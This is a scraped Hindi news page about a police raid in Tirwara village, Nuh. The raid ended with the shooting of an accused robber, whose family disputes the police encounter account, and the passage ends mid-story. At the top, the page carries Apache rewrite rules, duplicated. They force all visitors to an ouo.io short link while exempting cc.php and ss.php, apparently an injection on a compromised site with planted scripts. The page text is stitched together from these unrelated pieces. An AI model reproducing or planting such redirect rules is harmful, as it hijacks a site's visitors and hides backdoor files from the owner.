
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 425
Previous Nextनूंह। पुन्हाना पुलिस ने छापेमारी के दौरान लूट, डकैती, ओएलएक्स की लूट के मामलों में नामजद आरोपी को पकडने में कामयाबी हासिल की है। तिरवाड़ा गांव में कार्रवाई के दौरान बदमाश के सीने में गोली लगने का समाचार मिला है। पुलिस ने बदमाश को नल्हड मेडिकल कालेज में इलाज के लिए भर्ती कराया, जहां उसकी हालत खतरे से बाहर बताई जा रही है। पुलिस विभाग इस मामले को मुठभेड़ से जोड़कर देख रहा है, तो बदमाश के परिजन इसे एकतरफा फायरिंग बता रहे हैं। पुलिस अधिकारी अभी कुछ भी बोलने से कतरा रहे हैं। पुलिस सूत्रों के मुताबिक बदमाश अरशद उर्फ़ बुग्गा पुत्र सुलेखां उर्फ़ हब्बड़ निवासी तिरवाड़ा पर लूट डकैती, हत्या, बलात्कार, ओएलएक्स के द्वारा लूटपाट के करीब 19 मुकदमे बिछौर थाने मे दर्ज बताये जा रहे हैं।
जानकारी के मुताबिक शुक्रवार को दोपहर बाद पुलिस को सूचना मिली की कई मामलो में आरोपी अरशद उर्फ बुगगा पुत्र सुलेखा उर्फ हब्बड अपने साथियो के साथ तिरवाडा गांव में है। पुलिस को जैसे की सूचना मिली तो बिछौर थाना प्रभारी रामचंद व सीआईए इंचार्ज कुलबीर सिंह ने पुलिस बल के साथ गांव में बताई जगह पर पंहुचे। पुलिस को देखकर अरसद व उसके साथियो में भगदड मच गई।